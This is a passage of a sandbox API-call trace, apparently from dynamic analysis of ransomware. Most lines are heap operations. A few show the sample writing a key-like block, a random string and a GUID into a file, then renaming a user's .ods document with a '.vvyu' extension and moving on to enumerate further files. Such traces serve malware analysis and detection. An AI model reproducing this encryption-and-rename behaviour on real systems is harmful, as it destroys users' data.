[0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dd8 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d78 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d48 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42ec0 [0192.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0192.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0192.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42ec0 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b60 | out: hHeap=0x6a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.468] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb14*=0x5a3, lpOverlapped=0x0) returned 1 [0192.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.469] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.469] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.471] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.471] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.471] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.471] CloseHandle (hObject=0x584) returned 1 [0192.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0192.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d45778 [0192.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0192.473] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\y2190b-f euB_6uwcnlw.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\y2190b-f eub_6uwcnlw.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\y2190b-f euB_6uwcnlw.ods.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\y2190b-f eub_6uwcnlw.ods.vvyu")) returned 1 [0192.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.475] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0192.478] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2109d0, ftCreationTime.dwHighDateTime=0x1d89701, ftLastAccessTime.dwLowDateTime=0x2021b530, ftLastAccessTime.dwHighDateTime=0x1d89d89, ftLastWriteTime.dwLowDateTime=0x2021b530, ftLastWriteTime.dwHighDateTime=0x1d89d89, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y2190b-f euB_6uwcnlw.ods", cAlternateFileName="Y2190B~1.ODS")) returned 0 [0192.478] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0192.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.479] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0192.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.479] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0192.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.502] RtlAllocateHeap 